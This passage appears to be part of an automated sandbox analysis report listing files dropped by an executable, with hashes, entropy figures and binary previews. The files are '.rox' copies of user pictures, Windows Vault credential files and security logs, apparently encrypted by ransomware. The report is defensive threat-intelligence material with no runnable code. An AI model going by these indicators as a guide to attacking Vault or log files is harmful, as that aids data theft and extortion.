        SHA-512:8E0C6A13A505AD67ECB74C6209A68E12DCFEBE0A734F4002FCAC5666207E5994E6B0D88CC3273D49636024EF55861BB2890819F90689E9C47229C0DBB1D00E49
        Malicious:true
        Preview:8`2b...T.1...i.r.#-R.#.,..x.[...<&h.9`..!....W.j.S...?..3YN........D....FZ....I.'?....&.E...C.p.5..Y5.KVT..3ud....C..0..]..w...qzb..7..#~.n9W.........%....^a?...U5=..(;D&......?T.c.c..5..cy.b...;.6V..WW^AK...A.W.J....5.4..q.n0...i....../...F...D/.>fq..R..C....%..7F...k.....%.(....Mx0..C;3.$.k..^(..Cl....0.. .OzL.T.....f$...BE..Azm.6..D{,..A..0.b.5...|=(`!.BA.+K.<.......S...z...=.u...s.{qtV"E.....~....F....03U.9..`.w..............C.q...y..,...<t.KD-.T...*.!%....&...G.6.b.....QF....G.Q.o&z."}..d3.ee.#.&.."f..9..=~L..y.....2...oP..H.x.I.......F.Qe.T0...4.H..k....s.".<....r).&...X.hV. ..E.....[..m..O.n..S....IIQ..S...B.&......Uu]y=)....h.Z.!Fu&c.........b>..(..#w.w...g51... .8.q.RB.N-....)..8.WA.`M.ne.;..\.X,..<e....4..{..S..j`......T$q.(]...1C...'.N........a..B.sdPje1..2..2.{;..D).<l.^.D..R.f.5&B.q*.{.G@. ?....t.]u.....0....l.....b7Pe...9E-B.Y X'<T...4....A.1..E...a.....M.p,..&oXYq.M.Um7....K".p*8h}.x..m...?.q.EOyws-....xw.L.3G.x..P../.....ab...6rjR.

        C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.png.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):6189
        Entropy (8bit):7.969453972661459
        Encrypted:false
        SSDEEP:192:cOiEC63/pF9mQ/N1U7804AkITcDMBXCyJ4K:PtC63/pF9mQnAbiYXCyJv
        MD5:49F07EAC9B834D53C19B1853BAD12E22
        SHA1:3E8CB687AE0A62EB634D10FF8C356D1B6C138793
        SHA-256:64226D8778A9DA5449136B4C4182723216CF5D5F7DE453F630633A49E1EF40A2
        SHA-512:6AE176829128FFF2D6B0E1C44AEF19AA060D43AE4D013991A858C671392B3960CBF92BC279604943121F3FA7A5CFA55B55A3643088D1DA805F70DA62236A7892
        Malicious:false
        Preview:....@.....A.O..y...V.l.K~z.U=..a....;..~.^Yu5_uy.{.j..S..~.k..d....Dqh....DdJigr1.]`Z..eIu.{r..2.Vl.................B....V..Y...!......W...|...K5.+'..2.X~........z^.w%.Wd.{.Et...&..\..k...,...<]u..'.a....A":..i....NO.7.nf.`s...`^.^..V...y\.w.b'm..[Bk..#.Y.....5..L'e...O..Bs...]7,...*._.....c.........*.+.).......n.....>P&...qIP{..|Jo+....U0@.;.R.O..2..hB.....66.c.a.<.9.m......6..)....2.....zg.e...........j.....di.;K.o...-.k@s.%{...>...x.N*..+.D...=dh;t:./.9x...4....c...h.....&.~..V.+.GP..I..D%..8.>g..c.m.x.o.....4.....U M.c...\....[..\.!...D....*..b$...".Y.....l..B................+.'...Fv.HF..h...u.....<..T.7$........8.AZ...`.......e-...P...1,.(.d.1Y.a...Y..Au4.e...f.m....W..1..gT.h...#JL........].44.y.&.d.....j.Ja.Z.o.fH.y..(...Is1"kP..gOzM........0..a0l....gbz.......e.&j.V.@.}f,$...&.l..{..'C^...7K".$.E..6.tH...nI...8.....$....'R.Q.t......B0.e. ....+.+Dz....l07..)z..KE..... .....>..g'.>F../.F%.$g.'.~6%..x{..mHn....C...wz..._.F..I$T.

        C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user-192.png.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):2528
        Entropy (8bit):7.907985807307799
        Encrypted:false
        SSDEEP:48:JJctGWpXSyC3696jcFb4kjenApRzf8lYINjrFZU895erUJh:HNmiyC3j2bHeCzU5FZUprg
        MD5:987EF9D1C4659A0924BB42A1EF28BBDA
        SHA1:1C744AC590258F5711D30D75A364373F8734E9DD
        SHA-256:09858F1A4350FF396BAF558124FDB5BD38C52B708203B96B56A29B23DD97CAA3
        SHA-512:320222A2A0A593996D3DA498E48CBD26D96D7EA5043B5C71325BEC7112C1B4A7DD0FD29C24C7C1CD1B3C96037AF2BA49E7F97EB22A0593AFF48450225C390C1A
        Malicious:false
        Preview:.T...t...u.$..M.`..<..:E#..D...^Q^.Q@...?..Ydh..`...yw..|.Q.D.....4...U.! \6j....;yI.}.-*.3..v. .B.O..,..8.@.y.9....n(n..V.c..}r.B....8;"cw.u2..68..........=...C.....6.B..]...v...:q.=...-=..3G..K..s....|..CX.N.cg>....._..O....B\..z.......J..P...@..}...>..~..;.]... $..[..'?.3_A5....}r^..\......h>...X.=B..Vf........17e..=....V.-..GSpvL.....A...Y.LFL..,8...~F4ckr..8..p385......._4.`O:K.....2..."...~k...$.e-C.\u..w.].....&B....G..,Y.1.7...G.....{...R%.r/"tH...+....9.]...P{......H&^..6L.X.......8o9]e.'f......u....9.2.d.P :........u..........A..l...g......$...z.w.w{..]...B?...f.YK.F?9W.r.k.@.i.........gg.VG..mh.<.V.)......n...@..m..).A.{.P.;Z}..Q#..z.......5..*Hh......e..9.u'...}<........M.9$......3....a.F.#h}zt.i...>..m..2=j.h)L.me.I*....-\...'....b;....N......9M0O>+...-.....,...j......u'V.v..>...sj..W...plx..Dh.w.@...jw.. ....F..\....k}.s.......p.H..Y.......E...]k......4.8..... .x.3~...R..\...+....gh..}...{..........TC.}.K.)$.}hF...X...

        C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user-32.png.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):577
        Entropy (8bit):7.502999025887025
        Encrypted:false
        SSDEEP:12:4z11sbDDKiUjS1aMQ1i9EY54MQXhfXRIS/Djoln5tJD6N7BUQSBvGlPWA:4Zkyz9ji9EY54MQXXISMzJDE7CQAUWA
        MD5:74289058D1451D25142BEB6F31874136
        SHA1:25A8DBAE5F72A0CE7892C08FB84FDA8777E66089
        SHA-256:39E659ECBA5A7DB26CF684B437BA9B1800016B50D6EB270053BE11A12C729173
        SHA-512:A62EB12D856E1E8B1AB62EE0C28D7574257C6DFAEBA0E7DBAAB92B2B863A993EFD7974C0C9D1AA183AD442677F7AB4C69E2C68D841CE110B990E88AD77DA5C3D
        Malicious:false
        Preview:p.%....9..?.....W#X.....G.*&..PWiX.5......e...T4.>j_.(.sb8[.....i ^?......6......?S[..!1o.r...o..G..n..m.)d(..$.....X.....u[ln.y:........I.....j3.%.....<m..U..9...i...S.t.....8.A...V.P...M..../.X ....'..nX.Q.^9_>..U.%.*h....p..~G......,xOl...|[.z......m..v..".Z. .\.O.<..@j..!>...k.42.:u:..=$(.]....X...y.t..&0f..WN9p>..|yH1.u(h......V...MTP.yl.k..W....Sn2..v&.F..da@yH.pC&y.w..va...9....^.?.P..>.4..........3J+t.=|..9.!2A........(............................A..+...%.......M.'w...>.a."NXiS..?..X.Uv.7w.....n...m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user-40.png.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):661
        Entropy (8bit):7.523497647429559
        Encrypted:false
        SSDEEP:12:fi7akfj6DNoAjCGiNeby2Ty3w6eLldfV9S6k1jOu6cNcFlPWA:q7a1VjCGiNetTkILrd9S3cu6cNGWA
        MD5:9DF6DF27ACFA9E111B8B2349CCA7A1A8
        SHA1:D827C0CB006EC66582C2ACE8C5323CFF07E2AED2
        SHA-256:B0F571AA6EE87D413D0139F0A37970BCD1FA96757526F0F1C4EC2723C4B45CC6
        SHA-512:35929CFAB56C9580E63576583911C265ED89132A236DB5E9ED643868B5DA26EED2A63E2E4CBFDBC33A8862562BBA9FAC1D539AE8F55164F5C765DBD213067627
        Malicious:false
        Preview:...*.PR...z......=..<......s.TX..=b..ph.pd$=.Q*?.Wj..w....;A91...o.............]..s..........3`..L..*..j...TA`l...6.u.S...P..@i.F._z....S....6,..&g./<..H.3o......n.\....6.]..../....[N9N$.=.../pH.R...B....3.....&....I....}f[.#.o....Uw..*KK.".V..V.L9.uoj...L1...Y...x...o.........N.q.x........J/.N.Nm\...l.\.....H~...c.T.9.S../IxrL...s[.G...3..a.f..{..up}....@....cE.AL.H....@...nW.x....]h..B.[..N.>.:@.m........W..{r.L]........b..l.. M.;.... e?....k.t.W.E.-...l..1.."..J.R.P.....\...N.$.7.+..n..!2A........(............................?,.I[.......D..R..E...Dgi1..(#..>H...w[..VC..83......S.......m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user-48.png.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):753
        Entropy (8bit):7.610519339925889
        Encrypted:false
        SSDEEP:12:97I29xh8xZjgcCz4gSGbr7qyH+kSKt0jm536ykiDj5uAbd/e2mn6tnlPWA:G2exZtPg3nJSKSc36ykkFuSz9WA
        MD5:500AF2FB457A4DA7E66A0F2C7FF59C1D
        SHA1:F25C1B5C421011DBE65B8C16431AA343BC90BD35
        SHA-256:9CA3B390F5B8357BAE0DB3A501DB68AA6733FE9DAFDD5B94C2BC28ED05E4FAF7
        SHA-512:C94C0546C0EFF8FC2CA289F8781CF7BDB0C5674F56406C0260A05ABABD42DDBEEE6FE75CF64F4A6BA40CF287979A444F83CA6D261839665187983A4A7CE993CD
        Malicious:false
        Preview:I.u..EY4.zCO^........Q,....O.h8Q....../<i..y./2.[(oa~,..p....z...;m..%I..1c.M.......Zc..!......*.p..8...[QP,#.L+_z.j>.z..0.......}......g..*..%.........(|d.....9..j,.....d'...7W..WU .]BJ.K..(t.`.S.iY..F..Obq{4..%..G.DT...8R....p7L-8..gF:.ml.(I...n._.....H.Voi.V.......;7...g;..m...7.y.3[7.k...c....D!.n~.uO.?Gx........1.(7.?...j...d.H..6...A.. .`M...-C....u.....kg.H....{.6...M...X..OgZ...W.u;.x.n-..0....$.....9o.,D>d>'...9l.H6G..W~.a..l....$.'B%....W.V..;..z...Py..A.(....%.....~.c.{>.CA...S...........]>!...~.0.U...I..."z......5K..+!U`.@U.0..b...$+.].P../~.Q!....1.{..fM.1...DV.......!2A........(...................i.......M.V.y.[T...Z..u).T:4kA.qXe...^..x{.`T=L.....1.7.z...(.a.....m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user.bmp.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):602304
        Entropy (8bit):7.999691663555807
        Encrypted:true
        SSDEEP:12288:GCUFNYySjaqL695+NVXxiwA/5OPWpQ72Pofrn+Qonj9WZ5dHOWqIchIT/2N8u:tUFNHF+NVXkwAcPH7Rb+TnI5xOzIc+Ta
        MD5:ACF520A94AA8CE3337146C8CDDBD6BCE
        SHA1:24E1502A5120EAB93F32531B34BA12F14762C403
        SHA-256:25B9CD383D34EE2C108E1B200BB62FD887F468A111DF838B02F1DEFF68E061E4
        SHA-512:BC1D6A42EF625C3EDA8ED08A1D35FC7436A642EB0DC56BBF0CD04503A52CDF786AC9350957E7670AEDA3BF6522DD40D93888FB46AB071E550E8CE93DEF3E2D03
        Malicious:true
        Preview:...KYs../.....X;.J..."..(..|.P.H...>.;..+...P.Z.T/...x..MG.pKS._....G.O2i.n..{My.f..e..M.......xGQ.Y...JGM.[\FO|.#.....~v..m?.]..J..Bhg..H...<...B...[eQ.&..L..Yc..#`C...J....*...x}..e...q`9..S..... ........v.n.3....8.....C....9...Y0..n....^$t4+..I.?9/q...7.M........&..b.. ...^V.f)[..E...B....P./...j)....,?;...RN.xA..%.#Z..$A...k\w.`....yi.TL.n-Gt....hl/....c..a..S.".........f.&!.}.N.....x:!."fNV..:..U...X..9...p.T..E....7<.8.............?U.;.n......G....e.'....T.T... ......8....h...v[.d..X...p%.|..'.2...Y8.P..=.f!;....c.#.....&..-...).5.#u.....cwi.*.t..m4....mz.q.....E....._.;.Yo...kV..%. .3.W..Vkx....R}....i.OV.. .4I... ..I...).....'..."...w.k$..G.......}5..<..c._...T.k.mp....F......H.c....z..s...{.R.S..8......Q.s?l..o.-.:d.L(v....\]d...5..}...D#..U...`....oN....e.N..6........F.#......._B.e....jU{&p.J.W..|.).G.i..0..j.h6.h.O.\....0.n....j...&.;N.0.Q....G...9f.P.*.c....B.0..f..%z...\K..^...=4....'.k:` .G.{.C..-Y.?Z&u.....B...|......

        C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user.png.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):6189
        Entropy (8bit):7.96917136290856
        Encrypted:false
        SSDEEP:96:ALF6o87nS/QfgwhXJJRKu/YzEx6BgLhhD+PlaXaTTRw6PUHpCKVkjx4m5sOvVFF:ALChZrWEGwhhiPiaS6gQWDOtb
        MD5:6CCC24A03039B0D0A78D62010F5FAD51
        SHA1:20B8D3A05954BE545C04341D8478D04760809CE2
        SHA-256:9E111CC1FA8362EB90F46D5A21C8F33BFE0EB2C909CB1FB8D456EEA0216B344B
        SHA-512:8772D934EF6E6B35999143AFAB3AEC79204757CCB26E38192F52C8B779331FAE0ADC013EEE7AF41F392C0FE8C5BF847A3708CC488B333A61510D260E5A70E08B
        Malicious:false
        Preview:........e........[..Z..(zgy....K..$...7.... F..G.d....M.s.H.U......wN,I....K.Zc-..k...q8.i.>.....Uh..q.k9u..........|0....BJ..h..Q.:wM?...D....W.F..Y..$."`.@..OE....4q..6f.N.O[./......b..U.[.|.....}A..f..5p..c..RH......C0..A4..?..Q.f........;..0...(.jM..4....T..G...`..g.wxK.b.~....D..nV?y.h............N....So.P.d-Q...G.;<..oW.0...LR...m.xN..K.....M&\...?.....[S..*.@.\CU...2.B~..@..aJ......s..@5sC......w*.@.@.AD.H7".. `<...K.5v.M.....6.I....1..%fQ!..BZ9wY......0.*j..........Tk..Z.&........{Bu4W..6X&)k..o.@..P.*.4Q..\.q..In....'{..g..u]x......s.,....C.........s"/Y....1...._..1$..v..).x.r,.@.g.....E..F....t.......rA.1.......-;%...q.B.J...#.+MH.$.......=^..5#.......p.IYD'...Mxx..lC..q^x......A..r..J.w.JiN..Hr....^Z....<MX.v....m..F.B.7y.|/..TFa..&...h.R.@V...d.,...jf..N.^..j.....V..&..s~..:...Q.nM8..NP.b,n.sR{./....}:...[..Z..T...T.n..DHL.:.............0...........I.L7.l9...xCT.3.o...[U.........s_H.ks.k-D....;I6...]..i84.H#.\.9o.).......Dy..

        C:\Documents and Settings\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):294
        Entropy (8bit):6.904321706956151
        Encrypted:false
        SSDEEP:6:LbWK5r8XHZSlghgVd8QSNKn0MrQCHQn4wlU66Gu9ScPWA:Jm6g6Vd8HNKpQCHhwlU66GulPWA
        MD5:CD51730A5425879BAAFD45C5EF836F29
        SHA1:3861942A0EA2617A89EABED746B4F43AAB8AE9A8
        SHA-256:038198DCE1B1D3694809B3A7A4642C313CDF5D03988885B1A1A0C5EB37BFFA8E
        SHA-512:4247C4C78769F846A4E7235FB6690F1B0DA7190926007C33014964BD1B4708F89F7B43B1AFA1C22D124D741F3FD3315ECC3B2F5D955D2B94760479D1662FE251
        Malicious:false
        Preview:.'..,.v............z:...MY..2*.9.a.N.t...(....L....Q.Z..v?..*C.U.....1...k...4....A.h.......d..b....#...e...A.M.)T...X...m,.W.|%W..2..X.........3I.!2A........(.............................k.5a4..........._56l.ai.DS.e-..R........)(g.~@....P?<....m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):246
        Entropy (8bit):6.765200742577865
        Encrypted:false
        SSDEEP:6:Pq+6i3049IIuFxJ/NWiMc9AzaZDdKk9ScPWA:PtdmxJ/NWc6sLlPWA
        MD5:1762FE9426996F00633B3C472FBB2A29
        SHA1:6290AA7AC7D15118682E2474DFB1EF0320EC994A
        SHA-256:4DAC89DB6E8ED4BD647F6389201F95B1D2880875DA3694D61BBC2345DBA26DE7
        SHA-512:57CBA47AA77C3B823EBB499C289F6674A9276F02F1BB023FCDA10C9B35C5D21FC9BCA36865F02469FABFFDC3FDD811224A0D8637541C130D23068CEAEB7BB6A3
        Malicious:false
        Preview:...O#....../..&.v..7...e..E........=..%.2-q. 2~.?s.l4.."...G...s..l~..2H ...B.D.G.e.<."..0f.u.i...ACR....!2A........(...................n.......!C.K.....1[.....>..A.X..I..:x~9D.....O...&....a.k.f*P*.f....m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):398
        Entropy (8bit):7.258755850943104
        Encrypted:false
        SSDEEP:6:3JKv8qXsBYEnaRjKooK1U7o83botfvNUtUv+YcqamE0n6JS+lHzazLcB9ScPWA:3JKkHnhT7h3stfVIU+B1FHazLelPWA
        MD5:EE517492F5296FACAF9035A62FB883A0
        SHA1:3138464B7B59C9ACEB3AFEBC3DAC73FF725A4EE0
        SHA-256:11413D5008C4F14273C94CE3516DAD009806BDB7C69024E9C42FEA67697E8665
        SHA-512:ABD09B2F8BD758A916E2F834B1F71950D8B10958FBAB0F1968ED9FEB1B11DF6AC04EB1FE2C7B2290E93D98FC5F730AC0BD40537C40F729AA6BC5754932710985
        Malicious:false
        Preview:....>....7*.....sS...>0.V.-P..z.,...[5s..S....x..`T...b.P*Z.i3..2.u.(.9..d..*S`..r...).=$wD....^.y@...i:....y.U...y.O..M.....0.0ph...*Ly%$..{!..N;....l.QG^.Z2Y.F....5...........o.(Z.iO?.!.-..hs..F.f..l.w.9y....'.0../...:.if.....f.P.B$.*...|.z..e.!2A........(................................9...d..@F.mD....c.Q....B.....?f8.]..y....4.n..3..&.#...m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):580
        Entropy (8bit):7.497113246359895
        Encrypted:false
        SSDEEP:12:uwR3PlR+JtwYsUzeox0gy3gc8KSUsD48pQ9l1jGfmgwflPWA:X48Z3gy3gc8/4ZpBblWA
        MD5:B4885D4645C2E9D9CC293590D46BE1C6
        SHA1:A9C58AF03F19F40EFE04119E0014CACB059DA614
        SHA-256:B028AA2B244FD0791579641A4C0CA672036E945FEDE72698748DBD0D6E1CE65D
        SHA-512:3C3B8F4374F727723474E84A7EA6BDB9C163EB4319B7CEB0DD5CC9E04FD599B5BF21F2407FD6D47C92F814125BDBD739E9EB66099B370F2C52A468B26352D0C2
        Malicious:false
        Preview:.........@.{S]o.-u..F.j.W......,;.f.:1.*.i...3\C.5.VQ...2..ho..>.t.B....b.A7............}...l.e.=.....7..X\EP...&...&..-dS"v..48....!].1V.wNt.+......[WZo.m....(..b........d...r.....i....{....t?s..5..[+.@%..Q../l*.WQ.i.9.0...:..A..~.7.!._vm.j./.>....1.......3.n=W9..z)..R.r.s..........C..[.C..LO5.u=&.....s...1...)u...g...{.(............U.Ec.u...0.>.3....H.S.g(..;..U4.F.|...-.VB......"......8...,C.xM.+.k.O4n.....h6#d...M'..!2A........(............................y`.+...H.<X...|Wi.|.?G....{...Ool..J...B.....o..H.g...ko...m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-100219-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):12424
        Entropy (8bit):7.986480334395558
        Encrypted:false
        SSDEEP:192:qdybAT2+dwkZ4BZ5z3M85CrgwqpC7KIMH+4HoBgzGYnMTIZ0uOabbifn:q4ATydPlM1rgwDcH9UgWTIZff3iv
        MD5:DC1EF65139EA74E486A6F02AEA227ED0
        SHA1:3FD0AAB55576130AE953EDE7827A24B211565118
        SHA-256:C0580C77FAE35A9F25A4A8DD5B949A6BC6A0B148B66D8F9C4E1D2A9AEA7F4717
        SHA-512:E9DB2B23A4B3D2A7D70C04EAFA246C089C25058AA131F94D6F8A16C1AEDD3894A8117E6790BC2B02FA6D35A443A0F43D4233A24D85BAABBE910FABCF19126DCF
        Malicious:false
        Preview:.u.$50..l..u37.O.h..'...H.@...N.;1@..LN..O3. .~jm....3..=....].c..H.<..Z.S...k..mZ).S..;..m...WF..;..I.'.&.....e$e.q3.._.i.j.F....J.U.Z .$..>.g.U.qK/>.a...8..............5dfQX"R.DHi.._..m...Z.........~1~+DNF..=A.S-......D.........5.4.^.....y;...@uh..;.........*Q.%.(.....f.K..7s>5SI....f...ON..%..2.*$:..2....x....r....V6*..RrZ....J..R).eQ.X5..W..z...BX...a.e.....jp.....8.U..:8.m.JgAj..>y}.-@K.q.........U.....A..~9":...9z...VzLq...pq ...js0..sT.....1..hF....Q..OV..(.Lum_../KS...ain.4.._)..>...p...P..;....%...Q@?.^.g....N..)AA.L.g..k.^ils.NfL.......[df.3..8".J..x\..aZ.-S;.;.I.....=.(..........A....._..n.4......*...X.wy..E6l...../6....5..v.ID........FP...g..4,..d.y.jp..,5.,..L.....J...Yni..l...-d.K2.`.KP.j..6t.>.....u...|.a..Z.'D..d3z3Z.J.:.B.Gk......8l..,.<. 3..nh._`...K.G.........VRD|..%..S....p.T.VR XA...y.....<?[X...u..e.....|.._..3...X...;.n.r.D;..z.fb..ve.....).L.(.w...B..[.;..y..g.`r..`d....v...=*JK..1...W99._..m..fL.........:u8.&|.

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):20616
        Entropy (8bit):7.991127771945947
        Encrypted:true
        SSDEEP:384:oWY9hG0V+Cbm8T78it9g6sl7vW5NqZAX/yGJcejigJcGc/Pm8hGoxh/dffzoCtiQ:oWG4x8m8Pdt9gdJSqZSNWgJhahGoj/5L
        MD5:6C3752B2951E037CDDA6C9FD658F1408
        SHA1:F765E47B279087D3BE0E14409B3F6CC8ACE70D43
        SHA-256:254089BEE200319A5F3DEBD66C1154C48179431F4644056C9774674E5FE677AF
        SHA-512:D0F2D410802BF7A4DE4148CE1BCEEEED70D8AC0EAFB2BE473B5C759BE868A7F40843707C401DD9755AA925DDE8B89EB4B99F070A9557D8C8A886117F6BCF5257
        Malicious:true
        Preview:/....YR..h...>.u..........bP.$....zd....../(.k............3........5........(..P...k".j..W.B"''.WK.8.I..,{..F~RH....L*.9.]...9b.82?.....t .I...`F......;5.0.c..zf...(...A..riG..3..I..g....=...M/|.@.."{:;...P.P&:..E..R...W...(.x....f.......s\.\...vd~..K..L....~...L.....[...........Bbi+s.T...o'.&V...........*..&.e.3._.m=+..[.....MN..j.!..1...|?>.7...[..._}..X...e..6...H..Z.N..6.6...;>B..,._.w.#.0yGZQ..m...Tngw.......y.....st..h$./=....sD..".!....M..1....P.6.../..q.n,.Q.&.P...2..X.p.....Bk..M.3.0 1.%A..f.....s.C......$..=o.Yyf....K':.m.&({.....0J..J).B.> ..V_"..WX...o..6z...4..y.R1).G.8.._0..}..LU...2..6S...:...<.xt.)......5.vgr......!z.3.....bs....@."M..7U..$...|=..mp.-9.51g.` ..R.....E....d.@p.r./....,x..r.!..h9.T....eW.g...d=.z..Y.....r......b.m..XA.~...$A)#./vV..\^8\.K.=......<.a,....?...=..%..Gk,. FwX....NDEn.`..`.gD.Vv.j..9.$.....XD..'..f...f:.dC.....W3.q|e.WJ.V.1..%..#...5..3.R.N...[....^..$.s.$....;....h~.~...Ka.T<.bp.=a...G.

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):37000
        Entropy (8bit):7.995359593008787
        Encrypted:true
        SSDEEP:768:v4g3iDtWnbW1EdDvNfGgxEKg+OnQUPkYxiihQq7G3KiPgTwPsXHbQhY0It:v4fYbIEZpGgLOnQUPP/Cq7eoTI+tt
        MD5:A16D769507F5F02BE3FE982E61CE8A29
        SHA1:33ABC8A58D314ED44BD70EE061963DEC0C38FF11
        SHA-256:D26DC0658BA16F02AD50AA118DB65989F85D2E20A9E7F8100D02E8AE94647243
        SHA-512:01326B9BD1EE33F9ED9535279205DB697707BE051232D80B8B86D1D0BFA63C1BFB66FCEA97DBADB08CF82BA14A438F90AE05AF03A1F0AEF3F6811CE32891AF6D
        Malicious:true
        Preview:.0..&3Sb.l..s..,....0..-..L..,Je#...,.[../7.....+J.g....r..N1=K..n'e.........0...VXA..J)....3.f.X..MR#...L2:+-.$.....d.k ....;...W.RO.9.\BC..AZo....X9...<8Qr..-A.N>M.`...p.o.".}.j..Gd.VJm.S..',t..j..t...]%.lw.......O..*w..B...].......y.=q.(.y.3......,).1..,w.....+..s."".C.".|..A.yl.(0.Ibp...^....u../.....;(.o].|.SBR.U.N....D."}..T?......G.~.........sI..R.L"..c...`?.7.)/..$...bU..{Q..2-.G.3..T.\.2R<..<.-..,E..z...]....T.t!_J.i.......eTA.<..t..,o...+.....`.7.s...,aO[s.8....`Mu...`..A#d..h.......xN.:.;.....z..;..\...y.....i......(.....im...SIu.G..m.B.....g...dA_M...zrp.z.z...(.r.&n..........Njw..........A[.\.........6..R6.........Uh..^......)#...:....>....T.....9x$k.O..g5.r7..<...@...g."...Qv.j..~.6L..*.F.]..6R7d.~L.v.Hx/..icU1.X.v...+zE.._.5..z.7..WPm3.....$`.u .......E..b./.......q.@.j ..,.qR.Z...D...u....J....#..U...8'1.-.9...=o.J.OZI.W{....^p.y.|.......).gh....W@..aP.E..G.A~.e$.'..90...6..T..,.../q....L~.... .E''.......

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):24712
        Entropy (8bit):7.993585674702559
        Encrypted:true
        SSDEEP:768:hK6pDRiphQaWFmefNm7eBTEeJfAqBN3kDx:g6VRctWFGeBTE0ODx
        MD5:F01D1D22B653E1F4A8103A0110BF8367
        SHA1:34AC1515DD454768A8938EBD6CF527458C3B19A7
        SHA-256:8745E5499286CE390B75CF44D0A21F58B570F9E9A0B9C8A6027036F150BEB087
        SHA-512:9EE938F100A986819222924EFBD27A3C24E33145D0D21401E660EBDE06D72EA60362E37EB791D1C8F79761F7C976CC12349138638BE9032F9D77A03E8B36F948
        Malicious:true
        Preview:r......a...g.~,..v......uL@.7..=.`..b....Qs*.{.....b.....lB.r..m.....r.L}..B...L)........S.Y.....Lv^.[0...&C.?59..7...l.....K...+.GEM.w.h.]I.}.S..Aq.I`)[..f..JS.<.a$:......m.F4._.<.._.'7].....BJ$g.Z...b..6..=y.m?...qi..U...EyPeo.s<.Q......Q.T..zn...&.U....*...@<...g#.xF.SR..~F\E..h.."...bw.[.U.h.#...]...U..X..<...&n...`.l.@..16.......)]h.7.'\#e.s........(&..n(8s.<v.....V..d.T..z4.~.r+...{.]C.P......K..y.4..C..mu..B...Zp..sK.. v)z... .X..c..g9....._.#.9..W.].h..-..${../{.7.6........X..F.....J..yO..<...9@..]...S7...=5>.4..m.p:...rc...1......\2.=;..,"......<..&.O...S.....X..+./..:g'....IAE.`.G.a...>..:.w...c.<..g^k.S..z.o.R...;m.N.##...Q....a.dT.......a...G.08.......h\....8..{.O.....hO...vj.5....j..K4P.3.-y.....$.-..w..Y....I.:.iQ.....`.T^.dr....%.t.}..P.....Y.$(..%.=H..&.^e../B...=!i?9...G..ymT!..;.Z..~._......\&........u.A..U.D.2.+.b"V........?7.$m.lma..<N.'}S.M.%..Zm7.1..y...........u.D..!q.L.k .f..e...l]......o..d..DQ2I.v..

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):20616
        Entropy (8bit):7.991795451816438
        Encrypted:true
        SSDEEP:384:rrfVfadTWv3f/Gjt7e5MkD0IRysznU8vpz8Y5r4io:PpkWvP/GJS5X0I3UMgILo
